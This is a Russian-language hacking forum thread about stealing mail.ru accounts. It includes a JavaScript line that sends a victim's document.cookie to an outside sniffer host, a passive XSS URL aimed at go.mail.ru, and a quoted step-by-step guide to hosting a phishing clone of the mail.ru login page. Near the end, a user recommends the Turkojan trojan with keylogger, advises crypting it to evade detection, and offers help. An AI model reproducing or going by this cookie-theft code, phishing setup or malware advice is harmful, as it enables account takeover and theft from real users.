Цитата:

Сообщение от nacho

объясните плз как фейк вставить в картинку )

а ето что реально ?

a novie sposobi net?

Блин, не фига мне не приходят куки((

Добавлено через 1 минуту
Мож я че то не то делаю, вроде всё как описанно сделал..

img = new Image(); img.src = "http://httpz.ru/nrwlwmemn5w.gif?"+document.cookie;

Вот скрипт который написан в примере, его и делал... Но отправляю с Майла на Яндекс письмо с прикрепленым фалом .img открываю прямо с почтового ящика... захожу на сниффер в лог а там пусто

Добавлено через 22 минуты
Что надо заполнить в эти графы?

Пассивная XSS

url xss
и
url на редирект

Цитата:

Сообщение от feyruz

url xss

это адресс пассивной XSS уязвимости.до слова script

Цитата:

Сообщение от sfolo4

url на редирект

это туда куда перейдёт пользователь, после того как отдаст вам свои кукисы.

Это я понял) но что именно вписать туда, приведи какой нить пример, буду очень благодарен))

Добавлено через 1 минуту
и как узнать пассивный XSS для майл.ру?

Знаю что я полный нуб... Ими были все кто только начинал этому учиться...
Насчет ссылки на сниффер.. я просто тут указал для примера твой снифер.. но сам вставляю свой... этот http://httpz.ru/nh6pq46dlw6.gif

Вот я опишу подробно что я делаю... если будет не трудно, укажи ошибку...

начну с настроек сниффера
в поле Пассивная XSS
url xss я вписываю это
http://go.mail.ru/frame.html?imgurl=%22%3Ealert(document.cookie)
в поле url на редирект я без понятия что вписать...

Насчет скрипта
в бокноте я вписываю это

img = new Image(); img.src = "http://httpz.ru/nh6pq46dlw6.gif?"+document.cookie;

сохраняю как Фотка.img
отправляю тупо себе на мыло с другого тоже моего мыла...
Открываю мне вылазеет окношко, открыть... сохранить и т.д. я жму открыть..
потом иду на сниффер и проверяю логи, но там пусто..

Мож где то есть ошибка укажи на неё
Буду благодарен

Цитата:

Сообщение от _KAZAX_

взломать мыла на mail.ru с помощью фейка.
Что нам надо?
1.Фейк на mail.ru скачать...
2.Хост на http://www.1gb.ru


[img]http://hpc.name/imagehost/2009/10/17/

thumb_195094ad997f65858a.jpg[/img]


Нажимаем на "Заказать хостинг и регистрацию зтого домена"



Теперь можно проверить почтовый ящик на наличие писем который мы вписали при регистрации

Мы видим на нашем мыле 2 письма. Открываем их и следуем инструкции. В одном из письме мы видим логин и пароль доступа на наш акаунт на сайт http://www.1gb.ru
Входим в наш акаунт используя полученный лог и пас

В правой части находим вот такую фразу "Пароли на ресурсы (FTP, почта, mySQL)" и заходи туда.
Там мы видим дохрена всякой инфы, но нам нужна вот эта, смотрите на скрин:

Из этого следует что наш Фейк будет находится по этому адресу http://otkrytka-mai-ru.1gb.ru.
Наш FTP Сервет будет: otkrytka-mai-ru.1gb.ru
Логин: 1gb_otkrytka-mai-ru
Пароль: aaea4530
Третий шаг:
Устанавливаем программу CuteFtp.8.2.0.pro.build. Установили? Вносим туда наши регистрационные данные


Нажимаем Connect и попадаем вот сюда. Смотрим скрин

Заходим в папку http и всё от туда удаляем

Перед тем как залить сюда нашу фенечку заходим вот в этот файл login.php и вписываем строку куда мы пошлём нашу жертву после подтверждения регистрации (можете не вписывать я это за вас сделал)
Теперь можно и залить… Заливаем
Теперь наш Фейк готов.
При регистрации мы получили вот этот адрес (я его писал выше) http://otkrytka-mai-ru.1gb.ru
Заходим на него и что мы видим, а видим мы клон сайта для подтверждения регистрации на mail.ru.

Откуда копипаст????
мыло регать не обезательно!!!
на 1gb.ru пробник 10 дней, неудобно!!!
а так все норм, не считая того что слизал))

Цитата:

Сообщение от antidottt

как залить клавиатурный шпион на удалённый комп ? сделали бы спецы видео !

а не проще кинуть жертве к примеру Turkojan работает прекрастно.имеет и кейлогер.функционал на высоте!ток криптануть надо.если будеш искать его в сети смори заразу не подхвати.если нужен обращайся

Добавлено через 3 минуты

Цитата:

Сообщение от SooP

Напишите подробно, как заполнить снифер, и где брать данные для его заполнения

оброщайся помогу!